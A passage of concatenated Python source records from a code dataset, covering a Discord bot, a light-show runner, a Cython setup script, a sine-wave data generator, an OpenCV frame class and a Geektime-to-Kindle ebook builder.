embed=discord.Embed(title='You are now looking for a game')\n with open('/home/pi/pi_bot/lfg/' + message.channel.id + '.txt', 'w') as f_o:\n f_o.write(file)\n embed.set_footer(text='Requested By: ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n elif message.content.startswith('!pfp'):\n if len(message.mentions) == 0:\n await bot.send_message(message.channel, message.author.mention + ' Make sure to mention the user.')\n else:\n await bot.send_message(message.channel, message.mentions[0].avatar_url)\n elif message.content.startswith('!btc'):\n await bot.delete_message(message)\n loadingmsg = await bot.send_message(message.channel, 'Getting bitcoin rates...')\n btc = BtcConverter(force_decimal=True)\n embed = discord.Embed(title='Bitcoin -> Currency:', description='USD: $' + str(btc.get_latest_price('USD'))[0:8] + '\\nCAD: $' + str(btc.get_latest_price('CAD'))[0:8] + '\\nEUR: €' + str(btc.get_latest_price('EUR'))[0:8] + '\\nAUD: $' + str(btc.get_latest_price('AUD'))[0:8])\n embed.add_field(name='Currency -> Bitcoin:', value='USD: ฿' + str(btc.convert_to_btc(1, 'USD'))[0:10] + '\\nCAD: ฿' + str(btc.convert_to_btc(1, 'CAD'))[0:10] + '\\nEUR: ฿' + str(btc.convert_to_btc(1, 'EUR'))[0:10] + '\\nAUD: ฿' + str(btc.convert_to_btc(1, 'AUD'))[0:10], inline=False)\n embed.set_thumbnail(url=\"https://bitcoin.org/img/icons/opengraph.png\")\n embed.set_footer(text='Requested by ' + message.author.name)\n await bot.send_message(message.channel, embed=embed)\n await bot.delete_message(loadingmsg)\n return\n\t \n\t \n\t \n\t #End Of Command Constants\n if purgecheck == 'placeholder':\n await bot.delete_message(message)\n\n\n\n#Misc Fuctions\n@bot.event\nasync def get_server_roles(server):\n serverrolesfunc = []\n with open('/home/pi/pi_bot/roles/' + server.id + '.txt', 'r') as f_o:\n fileline = f_o.readline()\n for role in server.roles:\n if role.id in fileline:\n serverrolesfunc.append(role)\n return serverrolesfunc\n\nbot.run(TOKEN)", "sub_path": "pi_bot/pibot.py", "file_name": "pibot.py", "file_ext": "py", "file_size_in_byte": 26471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": 
[{"api_name": "discord.ext.commands.Bot", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.version", "line_number": 19, "usage_type": "attribute"}, {"api_name": "discord.Game", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.path.isfile", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 43, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 68, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 77, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 82, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 89, "usage_type": "call"}, {"api_name": "discord.Game", "line_number": 110, "usage_type": "call"}, {"api_name": "discord.ChannelType", "line_number": 125, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 146, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 159, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "name"}, {"api_name": "os.path.path.isfile", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 168, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 190, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 190, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 190, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path", "line_number": 201, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 213, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 218, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 229, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 238, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 242, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 266, "usage_type": "call"}, {"api_name": 
"os.path.path", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 266, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "name"}, {"api_name": "os.path.path.isfile", "line_number": 275, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 275, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 275, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 297, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 297, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 297, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 308, "usage_type": "call"}, {"api_name": "os.path", "line_number": 308, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 320, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 325, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 335, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 335, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 336, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path.path.isfile", "line_number": 346, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 346, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 346, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 349, "usage_type": "call"}, {"api_name": "os.path.remove", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path", "line_number": 357, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 361, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 364, "usage_type": "call"}, {"api_name": "forex_python.bitcoin.BtcConverter", "line_number": 377, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 378, "usage_type": "call"}]} +{"seq_id": "35473463", "text": "import time\nimport configparser\nfrom dataclasses import dataclass\nfrom datetime import datetime\n\n@dataclass\nclass Action:\n time: float\n box: int\n channel: int\n action: str\n\nclass ShowRunner:\n def __init__(self, powerBoxList, player, musicDir):\n self.powerBoxList = powerBoxList\n self.player = player\n self.musicDir = musicDir\n self.curentSong = \"\"\n self.actionList = []\n\n def readScript(self, scriptName):\n print(\"Reading script: \" + self.musicDir + '/' + scriptName + '.script')\n file = open(self.musicDir + '/' + scriptName + '.script', \"r\")\n self.actionList = []\n lines = []\n for line in file:\n# print(\"Line: \" + line)\n if (line != \"\\n\") and (not line.startswith('#')):\n lines.append(line.strip('\\n'))\n\n# for line in lines:\n# print(\"Good line: \" + line)\n\n # The first line should be the file name of the song to play\n self.currentSong = lines[0]\n\n for iter in range(1, len(lines)):\n# print(lines[iter])\n tokens = lines[iter].split(' ')\n newAction = Action(tokens[0], tokens[1], tokens[2], tokens[3])\n# print(\"Adding new action...\")\n# print(\" Time: \" + newAction.time)\n# print(\" Box: \" + newAction.box)\n# print(\" Channel: \" + newAction.channel)\n# print(\" Action: \" + newAction.action)\n self.actionList.append(newAction)\n return\n\n def runScript(self, 
endTime):\n if self.currentSong == \"\":\n print(\"No script currently loaded.\")\n return\n\n # Start the song\n if self.currentSong != \"none\":\n self.player.playSong(self.currentSong)\n\n # Set current time to zero. This will serve as the timer for running all of the actions.\n startTime = time.time()\n\n # Loop through the actions and run them per the scripted time.\n for action in self.actionList:\n # Check to make sure we are not past the end time for the show\n now = datetime.now().time()\n if (now > endTime):\n break\n\n actionTime = float(action.time) + startTime\n currentTime = time.time()\n if (actionTime > currentTime):\n time.sleep(actionTime - currentTime)\n\n self.executeAction(action.box, action.channel, action.action)\n\n self.player.stop()\n\n return\n\n def executeAction(self, boxID, channelID, action):\n\n if str(boxID) == '*':\n for box in self.powerBoxList:\n self.powerBoxList[box].sendCmd('*', action)\n else:\n try:\n self.powerBoxList[int(boxID)].sendCmd(channelID, action)\n except Exception as e:\n print(e)\n return\n\n", "sub_path": "venv/src/ShowRunner.py", "file_name": "ShowRunner.py", "file_ext": "py", "file_size_in_byte": 2855, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dataclasses.dataclass", "line_number": 6, "usage_type": "name"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 64, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 64, "usage_type": "name"}, {"api_name": "time.time", "line_number": 69, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "124273103", "text": "# -*- coding: utf-8 -*-\n\"\"\"pentapy: A toolbox for pentadiagonal matrizes.\"\"\"\nimport os\nfrom setuptools import setup, Extension\nfrom Cython.Build import cythonize\nimport numpy as np\n\n# cython extensions ###########################################################\n\nCY_MODULES = []\nCY_MODULES.append(\n Extension(\n \"pentapy.solver\",\n [os.path.join(\"pentapy\", \"solver.pyx\")],\n include_dirs=[np.get_include()],\n )\n)\nEXT_MODULES = cythonize(CY_MODULES) # annotate=True\n\n# embed signatures for sphinx\nfor ext_m in EXT_MODULES:\n ext_m.cython_directives = {\"embedsignature\": True}\n\n# setup #######################################################################\n\nsetup(ext_modules=EXT_MODULES, include_dirs=[np.get_include()])\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "setuptools.Extension", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.get_include", "line_number": 15, "usage_type": "call"}, {"api_name": "Cython.Build.cythonize", "line_number": 18, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.get_include", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "15833492", "text": "# Copyright 2018 The Yawn Authors. 
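\n# Typical local build of the compiled extension (standard setuptools usage,\n# not taken from this repo's docs):\n#     python setup.py build_ext --inplace\n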
", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 748, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "setuptools.Extension", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "numpy.get_include", "line_number": 15, "usage_type": "call"}, {"api_name": "Cython.Build.cythonize", "line_number": 18, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.get_include", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "15833492", "text": "# Copyright 2018 The Yawn Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Test data in the form of a quantized sine wave with added noise.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\nfrom data.quantization import quantiles, quantize, dequantize\n\ndef get_numpy_data(dataset_size, number_of_bins, scale):\n    \"\"\"Return a noisy quantized sine wave, its next-step labels, and the bin edges.\"\"\"\n    limits = 2.0*np.pi*scale\n\n    x = np.linspace(-limits, limits, dataset_size+1)\n    y = np.sin(x)\n\n    # Find a roughly even quantization\n    bins = quantiles(y, number_of_bins)\n\n    # Add noise\n    locs = np.array([-0.2, 0.2])\n    scales = np.ones(locs.size)/1e1\n    coeffs = np.ones(locs.size)/2.0\n\n    indices = np.random.multinomial(1, coeffs, size=y.size).argmax(axis=-1)\n    y += np.random.normal(loc=locs[indices], scale=scales[indices])\n\n    # Digitize\n    data = quantize(y[:-1], bins)\n    data_labels = quantize(y[1:], bins, dtype=np.int32)\n\n    # Turn feature data into sample points again\n    data = dequantize(data, bins)\n\n    return data, data_labels, bins\n\nif __name__ == '__main__':\n    import matplotlib.pyplot as plt\n\n    data, _, _ = get_numpy_data(1000, 64, 2)\n    plt.plot(data)\n    plt.grid(True)\n    plt.show()\n", "sub_path": "data/stochastic_quantized_sine_wave.py", "file_name": "stochastic_quantized_sine_wave.py", "file_ext": "py", "file_size_in_byte": 1854, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.pi", "line_number": 27, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 30, "usage_type": "call"}, {"api_name": "data.quantization.quantiles", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random.multinomial", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "data.quantization", "line_number": 44, "usage_type": "name"}, {"api_name": "data.quantization.quantize", "line_number": 44, "usage_type": "call"}, {"api_name": "data.quantization.quantize", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "data.quantization", "line_number": 48, "usage_type": "name"}, {"api_name": "data.quantization.dequantize", "line_number": 48, "usage_type": "call"}, {"api_name": "data.quantization", "line_number": 50, "usage_type": "name"}, {"api_name": "data.quantization", "line_number": 55, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.plot", "line_number": 56, "usage_type": "call"}, {"api_name": "data.quantization", "line_number": 56, "usage_type": "argument"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}]} +{"seq_id": "617612278", "text": "import cv2\nimport numpy as np\nfrom operator import mul\n\ndef isLight(frame):\n return frame.gray.mean() >= 120\n \nclass Frame(object):\n def __init__(self, img, cap=None, **kwargs):\n self.cap = cap\n self.parent = kwargs.get('parent', None)\n self.roi = kwargs.get('roi', None)\n \n self._img = img\n if cap is not None:\n self._ret = None\n self._time = cap.get(cv2.CAP_PROP_POS_MSEC)/1000.0\n self.number = int(cap.get(cv2.CAP_PROP_POS_FRAMES))\n else:\n self._ret = 'still'\n self._gray = None\n\n def _retreive(self):\n self._ret, self._img = self.cap.retrieve()\n if self.roi is None:\n yRange, xRange = self._img.shape[:2]\n self.roi = ( (0,0), (xRange,yRange) )\n\n def _retreiveIfNecessary(self):\n if not self.retreived:\n self._retreive()\n \n @property\n def roi(self):\n return self._roi\n\n @roi.setter\n def roi(self, roi):\n if roi is None:\n self._roi = None\n else: \n try:\n pt1, pt2 = roi\n except TypeError as e:\n raise TypeError('{0} not valid ROI. Must be unpackable into two points, e.g. `pt1, pt2 = roi`'.format(roi))\n else:\n self._roi = roi\n \n @property\n def img(self):\n self._retreiveIfNecessary()\n if self.roi is None:\n return self._img\n else:\n pt1, pt2 = self.roi\n return self._img[pt1[1]:pt2[1], pt1[0]:pt2[0]]\n\n @property\n def gray(self):\n self._retreiveIfNecessary()\n if self._gray is None:\n self._gray = cv2.cvtColor(self._img, cv2.COLOR_BGR2GRAY)\n\n if self.roi is None:\n return self._gray\n else:\n pt1, pt2 = self.roi\n return self._gray[pt1[1]:pt2[1], pt1[0]:pt2[0]]\n\n @property\n def offset(self):\n if self.roi is None:\n return (0,0)\n else:\n pt1, pt2 = self.roi\n return (pt1[0], pt1[1])\n \n @property\n def time(self):\n return self._time\n \n @property\n def retreived(self):\n return self._ret is not None\n \n @property\n def mask(self):\n return np.zeros(self.gray.shape, np.uint8)\n\n def subFrame(self, roi):\n return Frame(self._img, self.cap, roi=roi)\n\n @property\n def area(self):\n return mul(*self.img.shape[:2])\n \n def __repr__(self):\n\n retreive_stat = 'still'\n if self._ret == 'still':\n retreive_state = 'still'\n elif self.retreived:\n retreive_state = 'retreived'\n else:\n retreive_state = 'not retreived'\n \n if self.cap is not None:\n cap_stat = 'number={0}, time={1}'.format(self.number, self.time)\n else:\n cap_stat = ''\n \n # shape statistics\n if self._ret == 'still' or self.retreived:\n shape = 'shape={0}'.format(self._img.shape)\n else:\n shape = ''\n\n if self.roi is not None:\n roi_stat = 'roi={0}'.format(self.roi)\n else:\n roi_stat = ''\n \n return ''.format(shape=shape,\n roi=roi_stat,\n cap_state=cap_stat,\n retreived=retreive_state)\n", "sub_path": "CMAnalytics/video/frame.py", "file_name": "frame.py", "file_ext": "py", "file_size_in_byte": 3592, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "cv2.CAP_PROP_POS_MSEC", "line_number": 17, "usage_type": "attribute"}, {"api_name": 
"cv2.CAP_PROP_POS_FRAMES", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 88, "usage_type": "attribute"}, {"api_name": "operator.mul", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "589958107", "text": "# coding=utf8\nimport re\nimport os\nimport json\nimport datetime\nfrom geektime_dl.data_client import DataClient\nfrom . import Command\nfrom ..geektime_ebook import maker\nfrom kindle_maker import make_mobi\nfrom geektime_dl.utils.mail import MailServer\n\n\nclass EBook(Command):\n \"\"\"将专栏文章制作成电子书\n\n geektime ebook [--out-dir=] [--enable-comments] [--comment-count=]\n\n `[]`表示可选,`<>`表示相应变量值\n\n course_id: 课程ID,可以从 query subcmd 查看\n --out_dir: 电子书存放目录,默认当前目录\n --enable-comments: 启动评论下载,默认不下载评论\n --comment-count: 在启动评论下载时,设置评论条数,默认10条\n\n notice: 此 subcmd 需要先执行 login subcmd\n e.g.: geektime ebook 48 --out-dir=~/geektime-ebook\n \"\"\"\n\n @staticmethod\n def _title(c):\n if not c['had_sub']:\n t = c['column_title'] + '[免费试读]'\n elif c['update_frequency'] == '全集':\n t = c['column_title'] + '[更新完毕]'\n else:\n t = c['column_title'] + '[未完待续{}]'.format(datetime.date.today())\n return t\n\n def replace_window_file_name(self, file_name):\n file_name = re.sub(r'[ ??//::**<《》>\\|丨|、\\\\&]', '_', file_name) # windows not allowed\n file_name = re.sub(r'([0-9])_*', r'\\1', file_name) # number\n file_name = re.sub('_*$', '', file_name) # end\n file_name = re.sub('__', '_', file_name)\n file_name = re.sub('__', '_', file_name)\n return file_name\n\n def render_column_source_files(self, course_intro, course_content, out_dir, force=False):\n\n # TODO refactor here\n # cover and introduction\n course_intro = course_intro\n articles = course_content\n course_intro['column_title'] = self.replace_window_file_name(course_intro['column_title'])\n column_title = course_intro['column_title']\n for article in articles:\n article['article_title'] = self.replace_window_file_name(article['article_title'])\n\n output_dir = os.path.join(out_dir, column_title)\n if not os.path.isdir(output_dir):\n os.makedirs(output_dir)\n print('mkdir ' + output_dir)\n\n if not force and os.path.isfile(os.path.join(output_dir, '{}.html'.format('简介'))):\n print('简介' + ' exists')\n else:\n maker.render_article_html('简介', maker.parse_image(course_intro['column_intro'], output_dir), output_dir)\n print('下载' + column_title + '简介' + ' done')\n maker.generate_cover_img(course_intro['column_cover'], output_dir)\n print('下载' + column_title + '封面' + ' done')\n\n ebook_name = self._title(course_intro)\n maker.render_toc_md(\n ebook_name + '\\n',\n ['# 简介\\n'] + ['# ' + maker.format_file_name(t['article_title']) + '\\n' for t in articles],\n output_dir\n )\n print('下载' + column_title + '目录' + ' done')\n\n for article in articles:\n article_title = article['article_title']\n title = maker.format_file_name(article_title)\n if not force and os.path.isfile(os.path.join(output_dir, '{}.html'.format(title))):\n print(title + ' exists')\n continue\n maker.render_article_html(title, maker.parse_image(article['article_content'], output_dir), output_dir)\n print('下载' + column_title + ':' + article_title + ' done')\n\n def run(self, args):\n\n course_id = args[0]\n for arg in args[1:]:\n if '--out-dir=' in arg:\n out_dir = arg.split('--out-dir=')[1] or './ebook'\n break\n else:\n 
out_dir = './ebook'\n\n force = '--force' in args[1:]\n enable_comments = '--enable-comments' in args[1:]\n source_only = '--source-only' in args[1:]\n push = '--push' in args[1:]\n\n for arg in args[1:]:\n if '--comment-count=' in arg:\n comment_count = arg.split('--comment-count=')[1] or 10\n break\n else:\n comment_count = 10\n\n if not os.path.isdir(out_dir):\n os.makedirs(out_dir)\n\n dc = DataClient()\n course_data = dc.get_course_intro(course_id, force=True)\n\n if int(course_data['column_type']) not in (1, 2):\n raise Exception('该课程不提供文本:%s' % course_data['column_title'])\n\n # data\n data = dc.get_course_content(course_id, force=force)\n\n if enable_comments:\n for post in data:\n post['article_content'] += self._render_comment_html(post['comments'], comment_count)\n\n # source file\n course_data['column_title'] = maker.format_file_name(course_data['column_title'])\n self.render_column_source_files(course_data, data, out_dir, force=force)\n\n # ebook\n if not source_only:\n if course_data['update_frequency'] == '全集' and os.path.isfile(\n os.path.join(out_dir, self._title(course_data)) + '.mobi'):\n print(\"{} exists \".format(self._title(course_data)))\n else:\n make_mobi(source_dir=os.path.join(out_dir, course_data['column_title']), output_dir=out_dir)\n if push:\n\n fn = os.path.join(out_dir, \"{}.mobi\".format(self._title(course_data)))\n if os.path.getsize(fn) / 1024.0 / 1024 > 50:\n print(\"电子书大小超过50M\")\n return\n f = open(fn, 'rb')\n d = f.read()\n f.close()\n\n with open('smtp.conf') as f:\n smtp_conf = json.loads(f.read())\n m = MailServer(host=smtp_conf['host'], port=smtp_conf['port'], user=smtp_conf['user'],\n password=smtp_conf['password'], encryption=smtp_conf['encryption'])\n message = m.build_email(email_to=smtp_conf['email_to'], subject='convert', body='',\n attachments=[(\"{}.mobi\".format(self._title(course_data)), d)])\n m.send_email(message)\n print(\"push to kindle done\")\n\n def _timestamp2str(self, timestamp):\n if not timestamp:\n return ''\n\n return datetime.datetime.fromtimestamp(int(timestamp)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n def _render(self, c):\n replies = json.loads(c.get('replies'))\n\n reply = replies[0] if replies else {}\n replies_html = \"\"\"
\n\n{}{}\n{}\n\n \"\"\".format(reply.get('user_name'), self._timestamp2str(reply.get('ctime')),\n reply.get('content')) if reply else ''\n\n c_html = \"\"\"\n  • \n    \n    \n {user_name} {comment_time}\n    \n    \n {comment_content} {like_count}\n    \n {replies}\n    \n  • \n \"\"\".format(user_name=c['user_name'], like_count=\"[{}赞]\".format(c['like_count']) if c['like_count'] else '',\n comment_content=c['comment_content'],\n comment_time=self._timestamp2str(c['comment_ctime']), replies=replies_html)\n return c_html\n\n def _render_comment_html(self, comments, comment_count):\n if not comments:\n return ''\n\n count = min(len(comments), int(comment_count))\n comments = comments[:count]\n\n html = '\\n    \\n'.join([\n self._render(c)\n for c in comments\n ])\n h = \"\"\"\n    精选留言:\n    \n      \n \"\"\"\n f = '
    '\n return h + html + f\n\n\nclass EbookBatch(EBook):\n \"\"\"批量制作电子书\n 懒, 不想写参数了\n \"\"\"\n\n def run(self, args):\n if '--all' in args:\n dc = DataClient()\n data = dc.get_course_list()\n\n for i in [1, 2]:\n for c in data[str(i)]['list']:\n if not c['had_sub']:\n continue\n if True:\n # if c['update_frequency'] == '全集':\n try:\n super(EbookBatch, self).run([str(c['id'])] + args)\n print('\\n')\n except Exception as e:\n print(e)\n # else:\n # super(EbookBatch, self).run([str(c['id']), '--source-only'] + args)\n # print('\\n')\n\n else:\n course_ids = args[0]\n cid_list = course_ids.split(',')\n\n for cid in cid_list:\n super(EbookBatch, self).run([cid.strip()] + args)\n print('\\n')\n", "sub_path": "geektime_dl/cli/ebook.py", "file_name": "ebook.py", "file_ext": "py", "file_size_in_byte": 9218, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "datetime.date.today", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 36, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 40, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 41, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 42, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 43, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "geektime_ebook.maker.render_article_html", "line_number": 66, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 66, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.parse_image", "line_number": 66, "usage_type": "call"}, {"api_name": "geektime_ebook.maker.generate_cover_img", "line_number": 68, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 68, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.render_toc_md", "line_number": 72, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 72, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.format_file_name", "line_number": 74, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 74, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.format_file_name", "line_number": 81, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "geektime_ebook.maker.render_article_html", "line_number": 85, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 85, "usage_type": "name"}, {"api_name": "geektime_ebook.maker.parse_image", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, 
"usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 111, "usage_type": "call"}, {"api_name": "geektime_dl.data_client.DataClient", "line_number": 113, "usage_type": "call"}, {"api_name": "geektime_ebook.maker.format_file_name", "line_number": 127, "usage_type": "call"}, {"api_name": "geektime_ebook.maker", "line_number": 127, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "kindle_maker.make_mobi", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path", "line_number": 140, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 148, "usage_type": "call"}, {"api_name": "geektime_dl.utils.mail.MailServer", "line_number": 149, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 160, 